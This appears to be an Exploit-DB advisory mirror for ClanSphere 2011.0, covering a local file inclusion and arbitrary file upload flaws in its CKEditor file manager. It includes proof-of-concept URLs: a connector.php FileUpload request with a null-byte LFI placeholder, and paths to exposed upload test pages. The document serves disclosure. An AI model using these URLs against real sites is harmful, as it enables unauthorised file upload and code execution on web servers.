ClanSphere Local File Inclusion and Arbitrary File Upload Vulnerabilities

vendor:

ClanSphere

by:

7.5

CVSS

HIGH

Local File Inclusion, Arbitrary File Upload

CWE

Product Name: ClanSphere

Affected Version From: ClanSphere 2011.0

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

ClanSphere Local File Inclusion and Arbitrary File Upload Vulnerabilities

ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities. An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

Mitigation:

Patch or upgrade to a non-vulnerable version.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47636/info

ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities.

An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

ClanSphere 2011.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=[LFI]%00
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/test.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/uploadtest.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/browser.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html